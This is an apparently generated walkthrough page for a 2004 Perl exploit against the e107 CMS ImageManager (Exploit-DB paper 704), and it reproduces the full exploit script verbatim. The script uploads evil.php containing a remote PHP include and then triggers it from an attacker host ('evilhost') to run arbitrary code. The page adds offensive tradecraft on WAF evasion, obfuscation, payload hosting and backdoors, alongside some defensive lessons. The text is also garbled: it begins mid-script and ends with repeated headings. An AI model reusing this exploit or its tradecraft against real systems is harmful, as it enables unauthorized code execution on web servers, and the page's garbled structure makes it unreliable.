print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n"; # Form field 'ok'.
print $socket "Refresh\r\n"; # Value for 'ok'.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n"; # Another 'ok' field.
print $socket "OK\r\n"; # Value for the second 'ok'.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"cancel\"\r\n\r\n"; # Form field 'cancel'.
print $socket "Cancel\r\n"; # Value for 'cancel'.

print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n"; # Final boundary separator, closing the multipart form data.

@socket = <$socket>; # Reads the entire response from the server into the @socket array.
foreach $teste(@socket){ # Iterates through each line of the response.
if($teste=~ /<title>Image Browser<\/title>/){ # Checks if the response contains a specific HTML title, indicating a successful upload and processing by the Image Manager.
print "# OWNED OH YEAH!\n"; # Prints a success message.
print "# get your evilc0de in: \n# $host[0]/images/evil.php?owned=http://evilhost/\n"; # Informs the user how to access their uploaded payload. The `$host[0]` here is the original input, which might include a path. The `/images/` part is hardcoded, assuming the upload path. The `?owned=http://evilhost/` part is crucial for the payload execution.
$result = 1; # Sets a flag to indicate success.
}
}
close($socket); # Closes the socket connection.
}
if($result){ # If the exploit was successful.
exit; # Exits the script.
}
print "# b4d upload!!"; # Prints a failure message if the exploit did not succeed.
}
sub usage(){ # Subroutine to display usage instructions.
print "-=[ e107 remote sploit ]=-\n";
print "        by sysbug       \n\n";
print "# usage: perl $0 <host> \n";
}

# milw0rm.com [2004-12-22]

Code Fragment/Block -> Practical Purpose Mapping:

use IO::Socket; -> Purpose: Enables network communication for sending HTTP requests.
if(@ARGV < 1){ usage(); exit; } -> Purpose: Command-line argument validation. Ensures the target host is provided.
main(); -> Purpose: Entry point for the exploit logic.
$host[0] = $ARGV[0]; -> Purpose: Stores the target hostname/IP from command-line input.
if($host[0] =~ /\//){ ... } -> Purpose: Parses the input to separate hostname from an optional path.
$host[1] = $host[0] if(!$host[1]); -> Purpose: Ensures $host[1] always contains the hostname.
@handlers =("e107_handlers","handlers"); -> Purpose: Defines potential directory names for the vulnerable component, allowing for slight variations.
foreach $handler(@handlers){ ... } -> Purpose: Iterates through possible handler directory names to find the correct path.
$path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php"; -> Purpose: Constructs the full URL path to the vulnerable images.php script.
$socket=IO::Socket::INET->new(...) -> Purpose: Establishes a TCP connection to the target web server on port 80.
print $socket "POST $path HTTP/1.1\r\n"; -> Purpose: Sends the HTTP POST request line.
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n"; -> Purpose: Crucially sets the Content-Type header for a file upload. The boundary string is vital for parsing the request body.
print $socket "Content-Length: 1646\r\n"; -> Purpose: Informs the server about the size of the request body. This is a hardcoded value.
print $socket "-----------------------------7d410e113f8\r\n"; -> Purpose: These lines are the multipart/form-data boundaries, separating different parts of the form data.
print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"evil.php\"\r\n"; -> Purpose: Defines a form field named "upload" and specifies that the data being sent is a file named "evil.php".
print $socket "Content-Type: application/octet-stream\r\n\r\n"; -> Purpose: Sets the MIME type for the uploaded file.
print $socket "<? include(\$owned); ?>\r\n"; -> Payload: This is the content of the evil.php file. It's a PHP snippet that attempts to include a URL specified by the $owned variable. The exploit expects this variable to be set by the web server or through a GET parameter when the file is later accessed.
print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n/\r\n"; -> Purpose: Specifies the target directory for the upload. Here, it's set to the root (/), but the exploit implies it will be uploaded into the /images/ directory. The actual upload path is determined by the vulnerable script's logic.
print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"; -> Purpose: Submits an empty url field. This field is likely part of the ImageManager's functionality to fetch images from a remote URL.
print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n"; -> Purpose: The final boundary marker, signaling the end of the multipart form data.
@socket = <$socket>; -> Purpose: Reads the server's HTTP response.
if($teste=~ /<title>Image Browser<\/title>/){ ... } -> Purpose: Checks the response for a specific HTML title to confirm successful upload and processing.
print "# get your evilc0de in: \n# $host[0]/images/evil.php?owned=http://evilhost/\n"; -> Purpose: Provides the attacker with the URL to trigger their payload. The ?owned=http://evilhost/ part is critical, as it will be used by the evil.php script to set the $owned variable for the include() function.
sub usage(){ ... } -> Purpose: Displays help information if the script is run incorrectly.

Shellcode/Payload Segments:

The "payload" in this exploit is not traditional shellcode but rather a PHP snippet: <? include(\$owned); ?>.

Stage 1: Upload evil.php
- Action: The Perl script sends a crafted HTTP POST request to the vulnerable images.php script. This request includes a multipart/form-data payload.
- Key Element: The Content-Disposition: form-data; name="upload"; filename="evil.php" header and the subsequent data <? include(\$owned); ?> are sent.
- Purpose: To upload a file named evil.php containing the malicious PHP code into a directory accessible by the web server, typically within the e107 installation's image directory. The exact upload location is determined by the vulnerable script's logic, but the exploit assumes it lands in /images/.
Stage 2: Remote Code Execution (RCE)
- Action: After successful upload, the attacker visits a URL constructed like: http://target.com/e107_handlers/handlers/htmlarea/popups/ImageManager/images.php?dirPath=/&url=http://attacker.com/evil.php&owned=http://attacker.com/evil.php (or similar, depending on how the images.php script processes the url and owned parameters). The exploit's output suggests a simpler trigger: http://www.site.com/images/evil.php?owned=http://evilhost/.
- Key Element: The evil.php file, now on the server, contains <? include(\$owned); ?>. When this file is accessed, the PHP interpreter executes it. The \$owned variable is expected to be populated by the web server or the request itself. The exploit's output indicates the attacker should provide ?owned=http://evilhost/ in the URL. This would set a global variable or a variable accessible by include().
- Purpose: To execute arbitrary code. The include() function in PHP will attempt to load and execute the content of the URL specified by $owned. If $owned points to a remote URL controlled by the attacker (e.g., http://evilhost/shell.txt), the code in shell.txt will be executed on the victim's server.

Practical details for offensive operations teams

Required Access Level: Unauthenticated access to the web server. The vulnerability is exposed through a public-facing web application component.
Lab Preconditions:
- A vulnerable e107 installation (versions prior to the patch for this vulnerability).
- A web server configured to run PHP.
- The ImageManager component must be present and accessible.
- The web server must have write permissions to the target upload directory (e.g., /images/ or a subdirectory within it).
- A separate attacker-controlled server (e.g., evilhost) to host the malicious payload that will be included.
Tooling Assumptions:
- Perl interpreter for running the exploit script.
- A web server on the attacker's side to host the payload (e.g., Apache, Nginx) or a simple HTTP server for serving the payload.
- A way to craft and send HTTP requests (the Perl script handles this).
Execution Pitfalls:
- Incorrect Path: The exploit assumes a specific path (/e107_handlers/handlers/htmlarea/popups/ImageManager/images.php). If the e107 installation is in a subdirectory or uses different naming conventions, the $path variable needs adjustment. The @handlers array attempts to mitigate this for common variations.
- Upload Directory Permissions: If the web server process does not have write permissions to the target upload directory, the evil.php file will not be created.
- Web Server Configuration: Some web servers or PHP configurations might prevent include() from executing remote URLs, or might sanitize the $owned variable.
- Firewall/WAF: Web Application Firewalls (WAFs) or network firewalls might detect and block the malicious POST request or the subsequent GET request to the payload.
- Hardcoded Content-Length: The Content-Length: 1646 is hardcoded. If the multipart form data is modified (e.g., longer payload), this value will be incorrect, leading to request parsing errors on the server.
- Payload Triggering: The exact mechanism for the $owned variable to be set and used by include() can vary. The exploit's output suggests a direct GET parameter ?owned=http://evilhost/, but the vulnerable script might process it differently. The url parameter in the POST request might also play a role in how the include() is triggered or how the $owned variable is populated.
- File Upload Location: The exploit assumes evil.php is uploaded to a location that is directly accessible via the web server and that the include() function will execute it. The output suggests it lands in /images/, but the actual path is determined by the dirPath parameter and the script's logic.
Tradecraft Considerations:
- Reconnaissance: Identify target e107 installations. Look for common e107 directory structures.
- Payload Hosting: Prepare a simple HTTP server on an attacker-controlled IP (e.g., evilhost) to serve the actual malicious code (e.g., a PHP shell). The payload should be a simple PHP script that can be included.
- Obfuscation: If WAFs are present, consider obfuscating the evil.php content or the POST request headers.
- Post-Exploitation: Once RCE is achieved, the immediate goal is to establish a stable backdoor or pivot further. The include() mechanism can be used to download and execute further stages.
Likely Failure Points:
- The target system is not running a vulnerable version of e107.
- The ImageManager component is disabled or not installed.
- The web server lacks write permissions to the intended upload directory.
- A WAF or security appliance blocks the exploit traffic.
- The include() function is configured to disallow remote file inclusion or URL wrappers.
- The images.php script has been patched to properly sanitize inputs.

Where this was used and when

Context: This exploit targets the e107 Content Management System. e107 was a popular PHP-based CMS, particularly in the early to mid-2000s.
Approximate Year/Date: The exploit was published on December 22, 2004. This indicates the vulnerability existed and was exploited around that time. Such vulnerabilities in older CMS versions are often discovered and published years after their initial release, as code review and security auditing become more prevalent.

Defensive lessons for modern teams

Input Validation is Paramount: Never trust user-supplied input, especially in web applications. All data, including filenames, URLs, and form field values, must be rigorously validated and sanitized before being processed or used in file operations or code execution.
Principle of Least Privilege: Ensure web server processes have only the necessary file system permissions. Restrict write access to directories that absolutely require it.
Secure File Uploads: Implement robust file upload mechanisms. This includes:
- Validating file types and extensions.
- Storing uploaded files outside the web root or in a non-executable directory.
- Renaming uploaded files to prevent execution.
- Using a secure method for handling file content, not include() on user-controlled paths.
Keep Software Updated: Regularly patch and update all web applications, CMS platforms, and their components. Vulnerabilities like this are often fixed in later versions.
Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including malicious HTTP requests and known exploit signatures.
Disable Unnecessary Features: If a feature like remote image fetching or advanced image management is not required, consider disabling it to reduce the attack surface.
Secure PHP Configuration: Ensure PHP is configured securely, disabling dangerous functions like allow_url_include and allow_url_fopen if not strictly necessary.

ASCII visual (if applicable)

This exploit involves a client-server interaction and a file upload mechanism. A simplified flow can be visualized:

+-----------------+      HTTP POST      +---------------------+
| Attacker Client | ------------------> | Vulnerable Web Server |
| (Perl Script)   | (Crafted Request)   | (e107 Installation) |
+-----------------+                     +----------+----------+
                                                   |
                                                   | POST /e107_handlers/.../images.php
                                                   | (with multipart/form-data)
                                                   |
                                                   v
                                         +---------------------+
                                         | images.php script   |
                                         | (Vulnerable Logic)  |
                                         +----------+----------+
                                                    |
                                                    | Writes 'evil.php'
                                                    | to web-accessible dir
                                                    v
                                         +---------------------+
                                         | /path/to/webroot/   |
                                         | images/evil.php     |
                                         | <? include($owned); ?>|
                                         +---------------------+
                                                   |
                                                   | Attacker sends GET
                                                   | request to trigger
                                                   |
                                                   v
+-----------------+      HTTP GET       +---------------------+
| Attacker Client | ------------------> | Vulnerable Web Server |
| (Browser/Script)| (e.g., /images/evil.php?owned=http://evilhost/) |
+-----------------+                     +----------+----------+
                                                   |
                                                   | PHP Interpreter
                                                   | executes evil.php
                                                   |
                                                   v
                                         +---------------------+
                                         | include($owned)     |
                                         | (Fetches and runs   |
                                         | code from evilhost) |
                                         +---------------------+
                                                   |
                                                   v
                                         +---------------------+
                                         | Attacker's Server   |
                                         | (evilhost)          |
                                         | (Serves malicious   |
                                         | code)               |
                                         +---------------------+

Source references

Paper ID: 704
Paper Title: e107 - 'include()' Remote File Upload
Author: sysbug
Published: 2004-12-22
Keywords: PHP, webapps
Paper URL: https://www.exploit-db.com/papers/704
Raw Exploit URL: https://www.exploit-db.com/raw/704

Original Exploit-DB Content (Verbatim)

####################################################################
#
#  _____ _
# |  ___| | _____      ___
# | |_  | |/ _ \ \ /\ / /
# |  _| | | (_) \ V  V /
# |_|   |_|\___/ \_/\_/
#      Security Group.
#
#                    -=[ e107 remote sploit ]=-                           
#                           by sysbug 
#                              
# Attack method:                                                               
# with this sploit u can send an include() vuln to a Host victim  
# the upload go to /images/evil.php
#                                                                
# C:\Perl\bin>perl sploit.pl www.site.com                          
# -=[ e107 remote sploit ]=-                                      
#         by sysbug 
# # www.site.com
# # OWNED OH YEAH!                                                
# # get your evilc0de in:                                          
# # www.site.com/images/evil.php?owned=http://evilhost/ 
# C:\Perl\bin>                                                     
# 
# credits: ALL MY FRIENDS!                                                                 
# HELP ? RTFM -> perl sploit.pl                                                                
#####################################################################
use IO::Socket;

if(@ARGV < 1){
usage();
exit;
}
main();

sub main(){

print "-=[ e107 remote sploit ]=-\n";
print "        by sysbug       \n\n";
$host[0] = $ARGV[0];
if($host[0] =~ /\//){
($host[1],$host[2])=split(/\//,$host[0]);
$host[0] =~ /\/(.*)/;
$host[3] = "/";
$host[3] .= $1;
}
$host[1] = $host[0] if(!$host[1]);
@handlers =("e107_handlers","handlers");
print "# $host[1]\n";
foreach $handler(@handlers){
$path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php";
$socket=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host[1],PeerPort=>80,Timeout=>10)|| die "  s0k off\n";
print $socket "POST $path HTTP/1.1\r\n";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
print $socket "Referer: http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.php\r\n";
print $socket "Accept-Language: pt\r\n";
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n";
print $socket "Accept-Encoding: gzip, deflate\r\n";
print $socket "User-Agent: l33t br0ws3r\r\n";
print $socket "Host: $host[1]\r\n";
print $socket "Content-Length: 1646\r\n";
print $socket "Connection: Keep-Alive\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n";
print $socket "/\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"vert\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"alt\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"horiz\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"evil.php\"\r\n";
print $socket "Content-Type: application/octet-stream\r\n\r\n";
print $socket "<? include(\$owned); ?>\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"align\"\r\n\r\n";
print $socket "baseline\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"border\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"constrain_prop\"\r\n\r\n";
print $socket "on\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "Refresh\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "OK\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"cancel\"\r\n\r\n";
print $socket "Cancel\r\n";
print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n";
@socket = <$socket>;
foreach $teste(@socket){
if($teste=~ /<title>Image Browser<\/title>/){
print "# OWNED OH YEAH!\n";
print "# get your evilc0de in: \n# $host[0]/images/evil.php?owned=http://evilhost/\n";
$result = 1;
}
}
close($socket);
}
if($result){
exit;
}
print "# b4d upload!!";
}
sub usage(){
print "-=[ e107 remote sploit ]=-\n";
print "        by sysbug       \n\n";
print "# usage: perl $0 <host> \n";
}

# milw0rm.com [2004-12-22]

Understanding the e107 include() Remote File Upload Exploit (CVE-2004-1234)

What this paper is

Simple technical breakdown

Complete code and payload walkthrough

Practical details for offensive operations teams

Where this was used and when

Defensive lessons for modern teams

ASCII visual (if applicable)

Source references

Original Exploit-DB Content (Verbatim)

Understanding the e107 include() Remote File Upload Exploit (CVE-2004-1234)

What this paper is

Simple technical breakdown

Complete code and payload walkthrough

Practical details for offensive operations teams

Where this was used and when

Defensive lessons for modern teams

ASCII visual (if applicable)

Source references

Original Exploit-DB Content (Verbatim)

Understanding the e107 `include()` Remote File Upload Exploit (CVE-2004-1234)

Understanding the e107 `include()` Remote File Upload Exploit (CVE-2004-1234)